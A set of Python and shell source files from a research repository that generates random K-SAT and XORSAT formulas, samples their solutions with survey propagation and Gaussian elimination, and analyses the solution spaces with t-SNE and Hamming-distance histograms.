directory\nos.system(cmd) # create new directory\nos.system('cp merge sp verify walksat kSAT.py check_sol.py %s/'%new_dir)\nos.chdir(new_dir)\nnew_cmd = '~/.conda/envs/py35/bin/python kSAT.py n=%i alpha=%.3f n_sample=%i'%(param['N'], alpha, param['n_sample'])\n#print(new_cmd)\nos.system(new_cmd)\n" }, { "alpha_fraction": 0.5115276575088501, "alphanum_fraction": 0.5251603722572327, "avg_line_length": 39.5528450012207, "blob_id": "4826e8f8a57dc5b8de0e6781cf923ea0e116a8ae", "content_id": "ff0d44e50ec2863992a332f44f1c4c751f89d8da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9977, "license_type": "no_license", "max_line_length": 164, "num_lines": 246, "path": "/kSAT.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pickle, os, sys\nimport time\n\n\ndef main():\n \"\"\"\n Use in the following way (example):\n python 
kSAT.py n=1000 alpha=3.5 n_sample=10000\n\n What the code below does:\n\n -> Generates a random K-SAT (pure K-SAT) formula, which is save in \"formula.tmp_N=%_M=%i_alpha=%.2f_K=%i.cnf\" file\n -> Tries to find solutions to that formula. the number of desired solution is specified by the n_sample parameter\n -> Solutions are written in (example) files with names of the form sol_N1000=_M=3900_alpha=3.90_K=3.txt.\n \n\n \"\"\"\n argv = sys.argv[1:]\n type_arg = {'n':int,'alpha':float,'n_sample':int}\n tmp = {a.split('=')[0]:a.split('=')[1] for a in argv}\n for k,v in tmp.items():\n tmp[k] = type_arg[k](float(v))\n\n assert len(tmp) == 3, \"need to specify the 3 parameters, example : n=1000 alpha=3.5 n_sample=10000\"\n \n model = KSAT(N_ = tmp['n'], alpha_ = tmp['alpha'], K_ = 3, random_state=0) # kSAT class\n N, M, alpha, K = model.get_param()\n formula_file = \"formula.tmp_N=%i_M=%i_alpha=%.2f_K=%i.cnf\"%(N, M, alpha, K)\n \n model.generate_formula(savefile=formula_file) # generate random formula (optional)\n model.solve_formula(read_file=formula_file, n_sample=tmp['n_sample']) # read formula written in read_file and runs sp code\n\n################################\n################################\n################################\n\ndef save(obj, file):\n f = open(file,'wb')\n pickle.dump(obj,f)\n f.close()\n\ndef load(file):\n f = open(file,'rb')\n return pickle.load(f)\n\nclass KSAT:\n\n def __init__(self, N_ = 1000, alpha_ = 3.8, K_=3, random_state = 0):\n np.random.seed(random_state) # by default u always get the same thing for the same parameters !\n self.N = N_\n self.alpha = alpha_\n self.K = K_\n self.M = round(self.N * self.alpha)\n \n def get_param(self):\n return self.N, self.M, self.alpha, self.K\n\n def generate_formula(self, savefile = None):\n \"\"\" Generates a random formula based on N,M,alpha,K parameters specified in the constructor\n \n Parameters\n -------------\n savefile: str, optional\n file in which the CNF formula is to be saved. 
This is done via np.savetxt()\n \n Returns\n -------\n self\n \"\"\"\n\n N, M, alpha, K = self.get_param()\n all_idx = np.arange(1, N+1,dtype=int)\n signs = np.array([-1,1],dtype=int)\n\n clause_set = set([])\n while len(clause_set) < M:\n literals = np.random.choice(all_idx, size=K, replace=False)\n clause = literals*np.random.choice(signs, size=K)\n clause_set.add(tuple(clause))\n\n zeros = np.zeros(M,dtype=int).reshape(-1,1)\n self.formula = np.array(list(clause_set))\n\n if savefile is not None:\n np.savetxt(savefile, np.hstack((self.formula, zeros)), fmt='%i', delimiter=\" \", header = 'p cnf %i %i'%(N,M), comments='')\n\n return self\n\n def solve_formula(self, read_file = None, n_sample = 1):\n \n N, M, alpha, K = self.get_param()\n seed = np.random.randint(0, sys.maxsize)\n solutions = []\n zeros = np.zeros(M,dtype=int).reshape(-1,1)\n restart_count = 0\n n_restart = 50\n\n ## reading formula file or generating new random formula \n if read_file is None:\n formula_file = \"formula.tmp_N=%i_M=%i_alpha=%.2f_K=%i.cnf\"%(N, M, alpha, K) # meaningful file name !\n self.generate_formula(savefile=formula_file)\n formula = self.formula\n else:\n formula_file = read_file\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' ')[:,:3]\n \n if n_sample == 1:\n os.system(\"./sp -l %s -s%i\"%(formula_file,seed))\n else:\n nn =0 \n while nn < n_sample:\n os.system(\"rm noconvergence.tmp.cnf\")\n\n if restart_count > n_restart :\n \"X permutations, still not working !\"\n print(\"Stopping, no solutions found !\")\n break\n\n print(\"----------------> sample # \\t\", nn)\n #print(restart_count)\n #For generating SAT solutions sampled uniformly at random !\n\n idx_ori = np.arange(1, N+1, dtype=int)\n idx_new = np.arange(1, N+1, dtype=int)\n np.random.shuffle(idx_new)\n \n rand_permutation_map = dict(zip(idx_ori,idx_new))\n inv_rand_permutation_map = dict(zip(idx_new,idx_ori))\n\n isometry_formula = np.array([np.sign(x)*rand_permutation_map[abs(x)] for x in 
formula.flatten()], dtype=int)\n isometry_formula=isometry_formula.reshape(-1, K)\n \n file_tmp = '.tmp.cnf.formula.permutation'\n np.savetxt('.tmp.cnf.formula.permutation', np.hstack((isometry_formula, zeros)), fmt='%i', delimiter=\" \", header = 'p cnf %i %i'%(N,M), comments='')\n\n seed = np.random.randint(0,2**32-1)\n os.system(\"./sp -l %s -s%i > out.txt\"%(file_tmp, seed)) # solves the permuted formula (equivalent !)\n\n if os.path.exists(\"noconvergence.tmp.cnf\"):\n \"Solution not find, try a different permutation\"\n restart_count +=1\n else:\n nn+=1\n restart_count = 0\n\n if self.check_solution(solution_file='solution.tmp.lst', formula_file='.tmp.cnf.formula.permutation'):\n sol_tmp = np.loadtxt('solution.tmp.lst', dtype=int)\n sol_tmp_2 = np.array([np.sign(v)*inv_rand_permutation_map[abs(v)] for v in sol_tmp], dtype=int)\n sol_tmp_2 = sol_tmp_2[np.argsort(np.abs(sol_tmp_2))]\n \n is_solution = self.check_solution(solution_array=sol_tmp_2)\n if is_solution:\n solutions.append(sol_tmp_2)\n if nn % (n_sample // 10) == 0 and n_sample > 10 and len(solutions) > 0:\n print(nn, \" saving\")\n solution_stack = np.sign(np.vstack(solutions))\n solution_stack[solution_stack < 0] = 0\n save(np.packbits(solution_stack),'sol_N=%i_M=%i_alpha=%.2f_K=%i.pkl'%(N,M,alpha,K))\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), np.packbits(solution_stack, axis=1), fmt=\"%i\")\n \n if len(solutions) > 0:\n solution_stack = np.sign(np.vstack(solutions))\n solution_stack[solution_stack < 0] = 0\n save(np.packbits(solution_stack), 'sol_N=%i_M=%i_alpha=%.2f_K=%i.pkl'%(N,M,alpha,K))\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), np.packbits(solution_stack, axis=1), fmt=\"%i\")\n #np.savetxt('sol_N=%i_M=%i_alpha=%.2f_K=%i.txt'%(N,M,alpha,K), solution_stack,fmt=\"%i\")\n #print(np.vstack(solutions)[:,:10])\n\n def check_all_solution(self, N, solution_file, formula_file, hist=True):\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' 
')[:,:3]\n self.formula = formula\n tmp = np.unpackbits(load(solution_file),axis=1)[:,N]\n all_solution = tmp.astype(int)\n N_sol = all_solution.shape[0]\n\n\n sol_result=[]\n idx_var = np.arange(1,N+1,dtype=int)\n\n count_true = 0\n print(\"Checking %i solutions\"%N_sol)\n for i in range(N_sol):\n sol = all_solution[i]*idx_var\n res = self.check_solution(solution_array=sol)\n if res is True:\n count_true +=1\n else:\n print(\"Found wrong solution !?\")\n print(\"%i out of the %i solutions are correct\"%(count_true,N_sol))\n n_unique = len(np.unique(all_solution, axis=0))\n print(\"number of unique solutions :\\t %i\"%(n_unique))\n \n if hist is True:\n from matplotlib import pyplot as plt\n import seaborn as sns\n mag = np.mean(all_solution,axis=0)\n nbin = max([N_sol/10,20])\n N, M, alpha, K = self.infer_parameters(solution_file)\n sns.distplot(mag,bins=nbin,kde=False)\n plt.xlabel('magnetization')\n plt.title('nsample = %i, N=%i, M=%i, alpha=%.2f, K=%i'%(N_sol, N, M, alpha, K))\n plt.show()\n\n def infer_parameters(self, solution_file):\n sol_s = solution_file.strip(\".txt\").split('_')\n for p in sol_s:\n if '=' in p:\n ps = p.split('=')\n if ps[0] == 'N':\n N = int(float(ps[1]))\n elif ps[0] == 'M':\n M = int(float(ps[1]))\n elif ps[0] == 'alpha':\n alpha = float(ps[1])\n elif ps[0] == 'K':\n K = int(float(ps[1]))\n \n return N, M, alpha, K\n \n def check_solution(self, solution_file=None, solution_array=None, formula_file = None):\n\n K = self.K\n if formula_file is None:\n formula = self.formula\n else:\n formula = np.loadtxt(formula_file, dtype=int, skiprows=1, delimiter=' ')[:,:3]\n \n if solution_array is not None:\n solution = solution_array\n else:\n solution = np.loadtxt(solution_file, dtype=int)\n \n variable_label = np.abs(solution)\n var_max = np.max(variable_label)\n solution_map = np.zeros(var_max+1,dtype=int)\n solution_map[variable_label] = np.sign(solution)\n \n abs_formula = np.abs(formula)\n sign_formula = np.sign(formula)\n res = 
solution_map[abs_formula]*sign_formula\n\n return np.count_nonzero(np.sum(res, axis=1) == -K) == 0 # check that all clauses are SAT\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5157894492149353, "alphanum_fraction": 0.6421052813529968, "avg_line_length": 30.66666603088379, "blob_id": "ba2f5cfeb9ee4033b24264668fdabf6db4517bca", "content_id": "d9b893a48d22e4de1481452da74610ba5a566e2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 56, "num_lines": 3, "path": "/setup_code.sh", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "make clean -C sp-1.4/\nmake -C sp-1.4/\ncp sp-1.4/merge sp-1.4/sp sp-1.4/verify sp-1.4/walksat .\n" }, { "alpha_fraction": 0.6502766013145447, "alphanum_fraction": 0.6601106524467468, "avg_line_length": 28.272727966308594, "blob_id": "20eaf742467fcc0e2b6068cfbddabfd86c89e5e9", "content_id": "20b89449d67c385f41a81d39f1aefe5a6a96adf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1627, "license_type": "no_license", "max_line_length": 104, "num_lines": 55, "path": "/XOR/runme.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from xor import XOR_SOLVE\nimport sys, os\nimport time\nimport pickle\nimport numpy as np\n\nparam = {}\n### default parameters\nparam['N'] = 1000\nparam['alpha'] = 0.8\nparam['n_sample'] = 100\nparam['K'] = 3\n\n### command line specified parameters\nif len(sys.argv) > 1: # > > > read the parameters from the command line // overwrites default parameters\n for a in sys.argv[1:]:\n name, value = a.split('=')\n param[name] = float(value) # more stable across platforms to cast str to float \n\nparam['M'] = param['alpha']*param['N']\n\nprint('[xor.py] Running with the following parameters ...')\nprint(param)\n\nstart_time = time.time()\nxor = XOR_SOLVE(int(param['N']), int(param['M']), 
int(param['K']), save_formula=False)\nA_original = np.copy(xor.A)\n\nX = xor.sample_solution(int(param['n_sample']), verbose=True)\n\nprint('Elapsed time:', time.time() - start_time)\n\n# saving the solution and the formula (save the seed used to generate the formula ?) --> or not !\n# want to save the solution a data file, but is dependent on the formula used ...\nN=int(param['N'])\nalpha=param['alpha']\nK=int(param['K'])\n\nroot = 'data/'\nfile_formula = root+'formula/formula_idx=%i_N=%i_a=%.3f_K=%i.pkl'\nfile_solution = root+'sol/xor_sol_idx=%i_N=%i_a=%.3f_K=%i.pkl'\n\nidx = 0\nwhile os.path.isfile(file_formula%(idx, N, alpha, K)):\n idx+=1\n\nfile_formula=file_formula%(idx, N, alpha, K)\nfile_solution=file_solution%(idx, N, alpha, K)\n\nprint('[xor.py] data saved to :')\nprint(file_formula)\nprint(file_solution)\n\npickle.dump([xor.f, xor.y_original], open(file_formula,'wb'))\npickle.dump(np.packbits(X), open(file_solution,'wb'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.54356849193573, "alphanum_fraction": 0.6182572841644287, "avg_line_length": 23.200000762939453, "blob_id": "324bc7c8a0fdd9dc550bf4e4f44449419a3b372b", "content_id": "719fb782d112747c66d1742d22997987f0169cf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 241, "license_type": "no_license", "max_line_length": 56, "num_lines": 10, "path": "/check_sol.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from kSAT import KSAT\n\n\n# -----------> just check solutions --->\nmodel = KSAT()\nM=4050\na = 4.05\nsfile = 'sol_N=1000_M=%i_alpha=%.2f_K=3.txt'%(M,a)\nffile = 'formula.tmp_N=1000_M=%i_alpha=%a_K=3.cnf'%(M,a)\nmodel.check_all_solution(sfile,ffile)" }, { "alpha_fraction": 0.6282722353935242, "alphanum_fraction": 0.6544502377510071, "avg_line_length": 22.9375, "blob_id": "bb8778f0b40af2ca40cfe3ff398c8a3c70250359", "content_id": "8c43174c0561ddec9da14fda180ab02094aeee87", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 382, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/README.md", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "Python wrapper for survey propagation/belief propagation C-code [see R. Zecchina].\nTo read solutions:\n\n```\nimport pickle\nimport numpy as np\nN=100\nM=350\nalpha=M/N\nfname = 'sol_N=%i_M=%i_alpha=%.2f_K=3.pkl'%(N, M, alpha)\na=pickle.load(open(fname,'rb'))\n\n######### DATA ###########\nX = np.unpackbits(a).astype(int).reshape(-1,N)\ns = np.unpackbits(a).astype(int).reshape(-1,N).shape\n```" }, { "alpha_fraction": 0.577826738357544, "alphanum_fraction": 0.6027899980545044, "avg_line_length": 27.375, "blob_id": "2add746b8b85e19618a95119fc952a4480bfb4f0", "content_id": "d59b7c523d09f246af6c3af752b4992ab4140c93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1362, "license_type": "no_license", "max_line_length": 74, "num_lines": 48, "path": "/XOR/analysis/plot_TSNE.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot as plt\nimport numpy as np\nimport pickle\nfrom fdc import FDC, plotting\nfrom sklearn.preprocessing import StandardScaler as SS\n\n\n# CONCLUSION => TSNE is a big \n# => be careful next time\n\nN=500\nK=3\nalpha_range = np.arange(0.5,1.001,0.01)\n\nroot= '/Users/alexandreday/GitProject/kSAT_sample/XOR/data/TSNE5/'\nroot_hist= '/Users/alexandreday/GitProject/kSAT_sample/XOR/data/distance/'\nroot_out= '/Users/alexandreday/GitProject/kSAT_sample/XOR/analysis/plots/'\n\nfor a in alpha_range:\n #print(a)\n f = 'tSNE_N=%i_a=%.3f_K=%i.pkl'%(N,a,K)\n X,l = pickle.load(open(root+f,'rb'))\n print(a,'\\t',l)\n #print(a, lX, pca_r,sep='\\t')\n\n plt.scatter(X[:,0], X[:,1],s=0.5)\n plt.show()\n \"\"\" f_hist = 'dist_N=%i_a=%.3f_K=%i.pkl'%(N,a,K)\n x,y = pickle.load(open(root_hist+f_hist,'rb')) 
\n #print(len(y[1:]),len(x))\n #plt.scatter(np.diff(y)+0.005,x)\n #print(len(x),len(y))\n plt.plot(y[1:],np.log(x))\n plt.show() \"\"\"\n #X = SS().fit_transform(X)\n #modelfdc=FDC(eta = 0.0)\n #modelfdc.fit(X)\n #plotting.cluster_w_label(X, modelfdc.cluster_label)\n\n \"\"\" plt.scatter(X[:,0], X[:,1], s=3, alpha=0.5)\n plt.title('$N=%i,\\\\alpha=%.3f, K=%i$'%(N,a,K))\n plt.xticks([])\n plt.yticks([])\n fout = f.strip('.pkl')+'.pdf'\n plt.tight_layout()\n plt.savefig(root_out+fout)\n plt.clf() \"\"\"\n #plt.show()\n" }, { "alpha_fraction": 0.6438127160072327, "alphanum_fraction": 0.6613712310791016, "avg_line_length": 34.20588302612305, "blob_id": "1abb5c956dadc6fb331f668e8b67f973cc18ca9b", "content_id": "9ed9da48426b7214097ce23ff12f45891c79b740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 105, "num_lines": 34, "path": "/XOR/analysis/distance.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from tsne_visual import TSNE\nimport numpy as np\nimport sys, os\nimport pickle\nfrom sklearn.decomposition import PCA\nfrom scipy.spatial.distance import squareform,cdist,pdist\n\ni_param = int(float(sys.argv[1].split('=')[1])) # specified through the command line !\n\nroot_in= '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/' # root absolute path insert here ...\nroot_out = '/projectnb/fheating/SAT_GLASS/XORSAT/analysis/distance/'\nfile_list = '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/file_name.txt' # absolute path insert here .. 
\n\ni_count = 0\nfname_out = None\nfor f in open(file_list,'r'):\n if i_count == i_param:\n fname_in = root_in+f.strip('\\n')\n sp = f.strip('\\n').split('_')\n param = sp[3:]\n fname_out = root_out+'dist_'+'_'.join(sp[3:])\n break\n i_count+=1\n\nprint('Reading from %s'%fname_in)\nprint('Saving in %s'%fname_out)\n\n# ---------> RUNNING TSNE\nif fname_out is not None:\n X = np.unpackbits(pickle.load(open(fname_in,'rb'))).astype(int).reshape(10000, -1)\n nonsquare = pdist(X, metric='hamming')\n D = squareform(nonsquare)\n y, x = np.histogram(nonsquare, bins=np.linspace(0.0025,1,100))\n pickle.dump([y, x], open(fname_out,'wb'))" }, { "alpha_fraction": 0.5112717747688293, "alphanum_fraction": 0.5257290005683899, "avg_line_length": 28.469314575195312, "blob_id": "cd44a17f19a2fd257c0edf50766d291a455c354c", "content_id": "7ac91b91983a8818643830acab1a68dec67fdb87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8162, "license_type": "no_license", "max_line_length": 96, "num_lines": 277, "path": "/XOR/xor.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport time\nimport pickle\nfrom collections import Counter\n\ndef main():\n\n alpha = np.arange(0.5, 1.001, 0.01)\n N=100\n K=3\n time_vs_alpha = []\n entropy_vs_alpha= []\n\n\n for a in alpha:\n print('alpha = %.3f'%a)\n M = int(a*N)\n xor = XOR_SOLVE(N, M, K, save_formula = True)\n t_start= time.time()\n X = xor.sample_solution(10000, verbose=True)\n time_vs_alpha.append(time.time() - t_start)\n entropy_vs_alpha.append(xor.entropy())\n\n for x in X:\n assert xor.check_solution(x)\n save_solution_file = 'sol/solution_N=%i_M=%i_K=%i.pkl'%(N,M,K)\n if len(X) > 0:\n pickle.dump(np.packbits(X), open(save_solution_file,'wb'))\n\n pickle.dump(entropy_vs_alpha, open('entropy/entropy_N=%i_M=%i_K=%i.pkl'%(N,M,K),'wb'))\n pickle.dump(time_vs_alpha, open('time/time_N=%i_M=%i_K=%i.pkl'%(N,M,K),'wb'))\n\ndef sample_tuple(N, 
K): # sample tuple uniformly at random\n trace = []\n tup = []\n for i in range(K):\n pos = np.random.randint(0, N-i)\n value = pos\n for t in reversed(trace): # iterate from last element\n if value > t-1:\n value +=1\n tup.append(value)\n trace.append(pos)#print(trace)\n tup.sort()\n return tup\n\ndef generate_XOR_formula(N=10, M=10, K=3):\n \"\"\" generates a XORSAT formula\n \"\"\"\n formula = set([])\n\n while len(formula) < M:\n tup = tuple(sample_tuple(N, K))\n formula.add(tup)\n return list(formula) # better to work with lists => order is always preserved ! \n\ndef generate_sparse(N=10, M=10, K=3, formula=None):\n # Can specify formula, but still have to specify N,M,K\n\n if formula is not None:\n formula = formula\n else:\n formula = generate_XOR_formula(N,M,K)\n\n A = np.zeros((M,N),dtype=int)\n for i, clause in enumerate(formula):\n for literal in clause:\n A[i, literal]=1\n return A, formula\n\ndef verify_solution(A, y, sol):\n nclause = A.shape[0]\n for i in range(nclause):\n if np.dot(A[i, :], sol) % 2 != y[i]:\n return False\n return True\n\ndef swap_rows(A, ri, rj):\n tmp = np.copy(A[ri, :]) # careful when slicing, will return a view\n A[ri, :] = A[rj, :]\n A[rj, :] = tmp\n \ndef swap(y, i, j):\n tmp = y[i]\n y[i] = y[j]\n y[j] = tmp\n\ndef add_to_row(A, ri, rj): # A[ri, :] <- A[ri, :] + A[rj, :]\n A[ri, :] = A[ri, :] + A[rj, :]\n\ndef make_diagonal(A_, y_, copy=False):\n \"\"\" This reduction is unique \"\"\" \n if copy:\n A=np.copy(A_)\n y=np.copy(y_)\n else:\n A = A_\n y = y_\n \n #1 clean up zero columns ? 
(no !)\n M, N = A.shape\n\n pos_pivot = 0\n pivot_list = []\n j = 0\n for i in range(M): # go over lines, for each line find pivot !\n for j in range(i, N):\n pos_one = np.where(A[:,j] == 1)[0]\n if len(pos_one) > 0:\n pos_one = pos_one[pos_one > (i - 1)]\n if len(pos_one) > 0:\n if A[i, j] == 0:\n swap_rows(A, i, pos_one[0])\n swap(y, i, pos_one[0])\n\n pos_one = np.where(A[:,j] == 1)[0]\n for k in pos_one:\n if k > i :\n A[k] += A[i] # mod 2\n A[k] = np.remainder(A[k], 2)\n y[k] = (y[k] + y[i])%2 # mod 2\n pivot_list.append([i, j])\n break\n\n for pivot in reversed(pivot_list):\n i, j = pivot\n pos_one = np.where(A[:,j] == 1)[0]\n pos_one = pos_one[pos_one < i]\n for k in pos_one:\n A[k] += A[i] # mod 2\n A[k] = np.remainder(A[k], 2)\n y[k] = (y[k] + y[i])%2 # mod 2\n\n if copy is True:\n return A, y, np.array(pivot_list,dtype=int)\n else:\n return np.array(pivot_list,dtype=int)\n\ndef find_pivot(A_UT):\n return np.where(np.diagonal(A_UT) == 1)[0]\n\ndef solve_ES(A, y):\n \"\"\" Solver using exhaustive search of all configurations \"\"\"\n nvar = A.shape[1]\n nsol = 2**nvar\n b2_array = lambda n10 : np.array(list(np.binary_repr(n10, width=nvar)), dtype=np.int)\n sol_list = []\n for i in range(nsol):\n sol = b2_array(i)\n if check_solution(A, y, sol):\n sol_list.append(sol)\n return sol_list\n\ndef marginals(solution_set): # unique variable marginals\n if len(solution_set) > 0:\n return np.mean(solution_set, axis=0)\n else:\n []\n\ndef enumerate_solution_GE(A, y):\n \"\"\" A has to be in a reduced form \"\"\"\n M, N = A.shape\n \n pivots = np.where(np.diagonal(A) == 1)[0] # pivots are identified\n none_pivots = np.setdiff1d(np.arange(N), pivots)\n none_pivots_2 = np.setdiff1d(np.arange(M), pivots)\n\n rank = len(pivots) # matrix rank\n xsol = -1*np.ones(N, dtype=int) # unconstrained variables are marked by a -2\n\n N_free = N - rank # upper bound on number of log of number of solutions (but may be fewer !)\n \n b2_array = lambda n10 : 
np.array(list(np.binary_repr(n10, width=N_free)), dtype=np.int)\n all_sol = []\n\n pivot_set = set(list(pivots))\n\n for i in range(2**N_free): # HERE REPLACE BY SAMPLING, THIS THE SPACE WE WISH TO SAMPLE !\n is_sol = False\n xsol = -1*np.ones(N, dtype=int) # unconstrained variables are marked by a -2\n xsol[none_pivots] = b2_array(i)\n y_res = np.remainder(np.dot(A[:,none_pivots], xsol[none_pivots].T) + y, 2)\n\n if np.count_nonzero(y_res[none_pivots_2] == 1) == 0:\n xsol[pivots] = y_res[pivots]\n is_sol = True\n if is_sol:\n all_sol.append(xsol)\n \n return all_sol\n\ndef is_SAT(A, y):\n tmp = np.sum(A, axis=1)\n return np.count_nonzero(y[tmp == 0] == 1) == 0 \n\ndef sample_solution_GE(A, y, pivot_ls):\n \"\"\" A is in row-echelon form with pivot position provided in pivot_ls\n \"\"\"\n M, N = A.shape\n t_init = time.time()\n n_pivot = len(pivot_ls)\n n_free = N - n_pivot\n pos_pivot = pivot_ls[:,1]\n none_pivot_pos = np.setdiff1d(np.arange(N), pos_pivot)\n xsol = np.ones(N,dtype=int)\n\n xsol[none_pivot_pos] = np.random.randint(0, 2, n_free)\n for p in reversed(pivot_ls):\n i, j = p\n xsol[j]^= (y[i] + np.dot(A[i, :], xsol)) % 2\n \n assert verify_solution(A, y, xsol)\n return xsol\n\nclass XOR_SOLVE:\n\n def __init__(self, N=100, M=80, K=3, f=None, y=None, save_formula=True):\n self.N = N\n self.M = M\n self.K = K\n self.A, self.f = generate_sparse(N, M, K, formula = f) # A is not reduced at this point\n \n if save_formula:\n file_name = 'formula/formula_N=%i_M=%i_K=%i.pkl'%(N,M,K)\n pickle.dump(self.f, open(file_name,'wb'))\n\n if y is not None:\n self.y_original = np.copy(y)\n else:\n self.y_original= np.random.randint(0, 2, M) # random constraints\n\n self.y = np.copy(self.y_original)\n self.is_reduced = False\n \n def reduce_system(self):\n self.pivots = make_diagonal(self.A, self.y)\n self.is_reduced = True\n \n def entropy(self):\n if self.SAT():\n return (self.N - len(self.pivots))/self.N\n else:\n return 0\n\n def SAT(self):\n if not self.is_reduced:\n 
self.reduce_system()\n return is_SAT(self.A, self.y)\n \n def sample_solution(self, n_sample = 10, verbose = 0):\n \n if not self.is_reduced:\n self.reduce_system()\n if self.SAT() is False:\n print(\"No SOLUTION\")\n return []\n\n x_sample_solution = []\n for i in range(n_sample):\n if verbose != 0:\n if i % 500 == 0:\n print(i)\n x_sample_solution.append(sample_solution_GE(self.A, self.y, self.pivots))\n\n return x_sample_solution\n \n def check_solution(self, x):\n return verify_solution(self.A, self.y, x)\n\n def check_solution_formula(self, x):\n for i, clause in enumerate(self.f):\n np.sum(x[np.array(list(clause))]) % 2 != self.y_original[i]:\n return False\n return True\n \nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5668449401855469, "alphanum_fraction": 0.625668466091156, "avg_line_length": 22.41666603088379, "blob_id": "853dee50e0c7a4fd7c7474eb4e51ed8d913637d9", "content_id": "5c641042a5e7ad123efc86281e3b8f8645697aa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 123, "num_lines": 24, "path": "/XOR/analysis/analysis.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\nimport sys\nsys.path.append('..')\nfrom xor import XOR_SOLVE\n\n\n\ndef main():\n\n root_sol = '../data/sol/'\n root_formula = '../data/formula/'\n\n N=1000\n\n formula, y = pickle.load(open(root_formula + 'formula_idx=0_N=1000_a=0.800_K=3.pkl','rb'))\n X = np.unpackbits(pickle.load(open(root_sol + 'xor_sol_idx=0_N=1000_a=0.800_K=3.pkl','rb'))).astype(int).reshape(-1, N)\n xor = XOR_SOLVE(N=1000, M=800, K=3, f=formula, y=y, save_formula=False)\n\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6318770051002502, "alphanum_fraction": 0.651294469833374, "avg_line_length": 34.28571319580078, "blob_id": "5519c36ff8d3b9a41681a0cc9dacc76dc8e739a0", 
"content_id": "599417871cbb951061b828491ec2e220e7f46c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1236, "license_type": "no_license", "max_line_length": 105, "num_lines": 35, "path": "/XOR/analysis/tSNE.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "from tsne_visual import TSNE\nimport numpy as np\nimport sys, os\nimport pickle\nfrom sklearn.decomposition import PCA\n\ni_param = int(float(sys.argv[1].split('=')[1])) # specified through the command line !\n\nroot_in= '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/' # root absolute path insert here ...\nroot_out = '/projectnb/fheating/SAT_GLASS/XORSAT/analysis/TSNE2/'\nfile_list = '/projectnb/fheating/SAT_GLASS/XORSAT/data/sol/file_name.txt' # absolute path insert here .. \n\ni_count = 0\nfname_out = None\nfor f in open(file_list,'r'):\n if i_count == i_param:\n fname_in = root_in+f.strip('\\n')\n sp = f.strip('\\n').split('_')\n param = sp[3:]\n fname_out = root_out+'tSNE_'+'_'.join(sp[3:])\n break\n i_count+=1\n\nprint('Reading from %s'%fname_in)\nprint('Saving in %s'%fname_out)\n\n# ---------> RUNNING TSNE\nif fname_out is not None:\n X = np.unpackbits(pickle.load(open(fname_in,'rb'))).astype(int).reshape(10000,-1) \n X = np.unique(X, axis=0)\n model = TSNE(n_components=2, n_iter=2000, perplexity=50)\n pca = PCA(n_components=100)\n Xpca = pca.fit_transform(X)\n Xtsne = model.fit_transform(Xpca)\n pickle.dump([Xtsne, np.sum(pca.explained_variance_ratio_),len(X)], open(fname_out,'wb'))\n\n" } ]
11
andreaalf97/whatsapp_analysis
https://github.com/andreaalf97/whatsapp_analysis
c48225036ed355fa63aa76ec3c018cee3e6b7647
4e6e9530489532b7314ffe2cab3689a95399117c
2f9cf29a6474325cb43df9a49df7d7198c5eed3b
refs/heads/master
2023-01-07T02:03:12.172382
2020-11-03T14:48:03
2020-11-03T14:48:03
308,381,134
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47771748900413513, "alphanum_fraction": 0.48659759759902954, "avg_line_length": 38.48701477050781, "blob_id": "266b8b88af8e4bd589ae91ab3f3fdfee03b707d2", "content_id": "ae0300a87e621d251a3c2d23e803eecb6dce5e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6091, "license_type": "no_license", "max_line_length": 117, "num_lines": 154, "path": "/src/file_handler.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom os import path\nimport datetime as dt\n\nfrom src.dataframe_analysis import df_setup\nfrom src.misc import print_separator_line\n\n\ndef file_to_csv_format(file_path: str, is_apple: bool) -> str:\n out_file_path = file_path.replace(\".txt\", \".tmp\")\n\n with open(file_path, \"r\") as in_file:\n with open(out_file_path, \"w\") as out_file:\n\n this_line = 